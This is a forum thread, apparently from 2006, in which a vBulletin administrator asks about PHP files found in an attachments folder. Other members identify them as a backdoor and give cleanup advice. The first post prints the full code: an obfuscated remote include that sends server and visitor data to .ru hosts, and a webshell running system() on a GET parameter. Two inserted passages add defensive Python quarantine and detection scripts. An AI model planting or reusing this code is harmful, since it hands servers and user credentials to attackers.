Is this a trojan or backdoor in my images/attachments folder?

  • Lt. Dan
    New Member
    • Oct 2005
    • 21

    Is this a trojan or backdoor in my images/attachments folder?

    During a recent server change, I found these suspicious .php files in my images/attachments folder.

    First file is called 'includes.php' and contains the following code:

    PHP Code:
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

    The second file is called configs.php and contains the following code:

    PHP Code:
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u",ip2long(getenv(REMOTE_ADDR))) ."&url=".base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

    I've also found this code in two files in each of the subdirectories of all of my photopost image folders as well.

    Can anyone shed some light on this?
    Last edited by Lt. Dan; Fri 3 Feb '06, 1:25am.
  • TheMusicMan
    Senior Member
    • Oct 2002
    • 2140
    • 3.7.x

    #2
    Firstly, I don't see an images/attachments folder... similar I know but images/attach yes, but not the one you mentioned.

    Also, I don't see those files in my images/attach folder.

    This doesn't necessarily mean that you have been hacked, as it may be related to storing the attachments in the database/filesystem, but I'd submit a support ticket for this and ask vB Staff to comment for you.
    John


    • Lt. Dan
      New Member
      • Oct 2005
      • 21

      #3
      By default you won't have this folder. I moved my attachments out of the database and into this folder. The guy that found them told me that these files are phoning home to someone and that they open my server up to vulnerabilities. My question is, how did they get there? He says they appear to have been uploaded via http and not ftp... ???


      • TheMusicMan
        Senior Member
        • Oct 2002
        • 2140
        • 3.7.x

        #4
        Submit a support ticket and get vB Staff to provide you with the correct information. If I were you, I'd close my board temporarily too.

        I would also rename those files... or move them to a secure area for subsequent investigation. It seems to me now that your board is vulnerable at the moment.
        John


        • Lt. Dan
          New Member
          • Oct 2005
          • 21

          #5
          I have another board running on 3.5.3 and I've found that it too already has these php files embedded in all the attachment folders as well.

          Every attachment folder has a messages.php and a configs.php file in them with the same code.


          • Marco van Herwaarden
            Senior Member
            • Nov 2004
            • 6999
            • 3.8.x

            #6
            I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

            You might want to check your server logs to see how they came there.

            I also suggest you ask your host for support on cleaning the server after a possible hack.
            Want to take your board beyond the standard vBulletin features?
            Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org


            • Lt. Dan
              New Member
              • Oct 2005
              • 21

              #7
              Originally posted by MarcoH64
              I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

              You might want to check your server logs to see how they came there.

              I also suggest you ask your host for support on cleaning the server after a possible hack.
              It's very odd that these same files appeared in a new directory on a different forum in the same locations.

              The guy that analyzed them for me said they were uploaded via http and not ftp, which he thought was odd.

              I also found a .htaccess file in each of the attachment directories which appears to reference the suspect .php files.
              Last edited by Lt. Dan; Wed 15 Feb '06, 5:19am.


              • RedWingFan
                Senior Member
                • Sep 2004
                • 371
                • 4.0.0

                #8
                What permissions do you have on these folders? I have avatars and attachments stored in the filesystem, and when I did the conversion, vB set up the directories for me. I went in now and noticed that permissions are 707 for both of these directories, meaning they are writeable. Had I known, I may have opted to keep these in the database.

                Didn't find these files mentioned above, but IMHO, it's only a matter of time before someone attempts it. I wish the conversion function in vB had warned me about this beforehand. (Or maybe it did, and I don't remember...?)

                The only cure I can think of is a cron job that would delete any files with the .php extension, since these contain only images. Or even set up my own PHP script to run via cron that would clear out anything that is not an image file. Not the best idea, but it might work for now...

                Originally posted by Lt. Dan
                I also found a .htaccess file in each of the attachment directories which appears to reference the suspect .php files.
                Could you post the contents of that here (removing anything sensitive, of course)?
                Last edited by RedWingFan; Wed 15 Feb '06, 6:32am.

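RedWingFan's cron idea above, carried one step further as an added example (not the poster's or vBulletin's own code): rather than deleting by extension, it moves anything that is not an image by content, plus any .htaccess it did not write itself, into a quarantine tree for later inspection, and then installs an .htaccess that stops Apache from executing scripts in the attachment folder. It assumes Apache with mod_php (2.2-style access rules) and Python 3 on the host; the quarantine directory is a placeholder you choose, kept outside the web root.

```python
import shutil
from datetime import datetime, timezone
from pathlib import Path

# Signatures of the formats an attachment tree is expected to hold. Checking
# content rather than extension also catches a "photo.jpg" that is really PHP.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

# Replacement .htaccess (assumption: Apache with mod_php, 2.2-style rules).
# One copy at the tree root covers subdirectories once theirs are removed.
HARDENED_HTACCESS = (
    "# attachment storage: never execute scripts here\n"
    "php_flag engine off\n"
    '<FilesMatch "\\.(php|phtml|php[0-9]|phar)$">\n'
    "  Order allow,deny\n  Deny from all\n</FilesMatch>\n"
)

def is_image(path: Path) -> bool:
    """True if the file starts with a known image signature."""
    with path.open("rb") as fh:
        return fh.read(8).startswith(IMAGE_MAGIC)

def quarantine_non_images(attach_dir: Path, quarantine_dir: Path) -> list[str]:
    """Move every non-image file (and any foreign .htaccess) out of attach_dir
    into quarantine_dir, preserving relative paths for forensics, then drop the
    hardened .htaccess in place. Returns the relative paths that were moved."""
    quarantine_dir.mkdir(parents=True, exist_ok=True)
    moved = []
    for p in sorted(attach_dir.rglob("*")):      # list is materialised first
        if p.is_dir():
            continue
        if p.name == ".htaccess" and p.read_bytes() == HARDENED_HTACCESS.encode():
            continue                               # our own file, idempotent
        if p.name != ".htaccess" and is_image(p):
            continue                               # legitimate attachment
        rel = p.relative_to(attach_dir)
        dest = quarantine_dir / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.move(str(p), str(dest))
        moved.append(rel.as_posix())
    (attach_dir / ".htaccess").write_text(HARDENED_HTACCESS)
    with (quarantine_dir / "quarantine.log").open("a") as log:
        stamp = datetime.now(timezone.utc).isoformat(timespec="seconds")
        log.writelines(f"{stamp} {name}\n" for name in moved)
    return moved

if __name__ == "__main__":
    import sys
    for name in quarantine_non_images(Path(sys.argv[1]), Path(sys.argv[2])):
        print("quarantined", name)
```

Run it from cron with the attachment directory and the quarantine directory as its two arguments; a second run on a clean tree moves nothing.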

                • sensimilla
                  Senior Member
                  • Sep 2004
                  • 264
                  • 3.8.x

                  #9
                  It looks like a backdoor shell uploaded by a script kid to your forum directories.
                  Delete those files at once, change all DB passwords, change all users' passwords,
                  ask your hoster to change your FTP access pass,
                  and I would recommend deleting all files from the server and replacing them with new ones downloaded from vbulletin.com.

                  btw.. this part

                  PHP Code:
                  ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                  after decoding gives

                  you are pwned
                  Last edited by sensimilla; Wed 15 Feb '06, 6:39am.

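An added triage script (not the thread's code and not vBulletin's) that does for every base64_decode("...") literal what sensimilla did by hand in #9, and flags the sinks visible in the two files from the first post: an include whose target is a decoded string, a shell function fed straight from $_GET/$_POST, backtick execution, and error_reporting(0). The PHP strings below are constructed stand-ins with an inert host, and the regexes are assumptions tuned to this family, not a general webshell detector.

```python
import base64
import re
from pathlib import Path

# Traits the two dropped files share (assumed sufficient for this family;
# real triage would also review the planted .htaccess files and upload logs).
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]{4,})["\']\s*\)')
SINKS = {
    "remote_include": re.compile(r'\binclude(?:_once)?\s*\(\s*base64_decode'),
    "cmd_from_request": re.compile(
        r'\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST)\b'),
    "backtick_shell": re.compile(r'`[^`\n]+`'),
    "errors_silenced": re.compile(r'error_reporting\s*\(\s*0\s*\)'),
}

def decode_literals(src: str) -> list[str]:
    """Plaintext of every base64_decode("...") literal, so phone-home hosts read."""
    out = []
    for m in B64_LITERAL.finditer(src):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:                      # binascii.Error is a ValueError
            out.append("<undecodable>")
    return out

def triage(src: str) -> dict:
    """Which sinks fire in one PHP source, and what its literals decode to."""
    hits = [name for name, rx in SINKS.items() if rx.search(src)]
    return {"sinks": hits, "decoded": decode_literals(src), "suspicious": bool(hits)}

def scan_tree(root: Path) -> dict:
    """Triage every .php under an attachment tree; a clean tree yields {}."""
    return {p.relative_to(root).as_posix(): triage(p.read_text(errors="replace"))
            for p in sorted(root.rglob("*.php"))}

# Constructed samples (not the thread's full files): same shape, inert host.
SAMPLE_DROPPER = ('<?php error_reporting(0); @include(base64_decode("aHR0cDovLw==")'
                  '."example.invalid/?x"); if(isset($_GET["k"])){system($_GET["k"]);} ?>')
SAMPLE_CLEAN = '<?php echo htmlspecialchars($_GET["name"] ?? ""); ?>'

if __name__ == "__main__":
    import json, sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    print(json.dumps(scan_tree(target) if target else triage(SAMPLE_DROPPER), indent=2))
```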

                  • Lt. Dan
                    New Member
                    • Oct 2005
                    • 21

                    #10
                    Originally posted by sensimilla
                    It looks like a backdoor shell uploaded by a script kid to your forum directories.
                    Delete those files at once, change all DB passwords, change all users' passwords,
                    ask your hoster to change your FTP access pass,
                    and I would recommend deleting all files from the server and replacing them with new ones downloaded from vbulletin.com.

                    btw.. this part

                    PHP Code:
                    ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                    after decoding gives


                    you are pwned
                    That's what I was thinking myself. Nothing has happened on my server, so I'm guessing this was something automated. These files only show up in my VBB images/attachments folders and no place else.

                    I installed a second VBB to my server about a month ago and these files popped up in this one too.

                    The image/attachments folder is the default location that VBB looks to put attachments when you pull them out of the database, so perhaps it's a script that looks to exploit those folders. VBB recommended CHMOD 777 when I created that folder, so that directory and all files are 777, which is probably how it was exploited.

                    The guy that found this on my server said that these scripts will allow the hacker to execute any function allowed on my server, but I've never had anything malicious happen on my server.


                    • Marco van Herwaarden
                      Senior Member
                      • Nov 2004
                      • 6999
                      • 3.8.x

                      #11
                      You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDOS attack.


                      • Lt. Dan
                        New Member
                        • Oct 2005
                        • 21

                        #12
                        Originally posted by MarcoH64
                        You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDOS attack.
                        Agreed, that is why I'm trying to find out what is going on. I've got the VBB guys looking at this as well. I dug through all of my files and haven't found this any place else.

                        I deleted all the suspicious PHP and .htaccess files and then uploaded my attachments into a directory with a different name to see if these files reappear.

                        The odd thing is that these files were uploaded via http, not ftp. How was this done?


                        • Marco van Herwaarden
                          Senior Member
                          • Nov 2004
                          • 6999
                          • 3.8.x

                          #13
                          Probably by a script somewhere on your server that you have not found yet.


                          • Lt. Dan
                            New Member
                            • Oct 2005
                            • 21

                            #14
                            Originally posted by MarcoH64
                            Probably by a script somewhere on your server that you have not found yet.
                            If that is the case, deleting everything in my public_html directory should get it, right?


                            • Marco van Herwaarden
                              Senior Member
                              • Nov 2004
                              • 6999
                              • 3.8.x

                              #15
                              Only if the hack is done on your account.

                              Is it a dedicated server, or shared hosting?

                              PS The script could be almost anywhere on your server, even embedded in a regular file/script.

                              There are some tools to help find these kinds of things, like chkrootkit; your host should know more about them. Unfortunately, unless you can find exactly how the server was compromised and you can find all traces of it, the only secure way to get rid of things like this is a complete new install (OS and everything) with clean files.
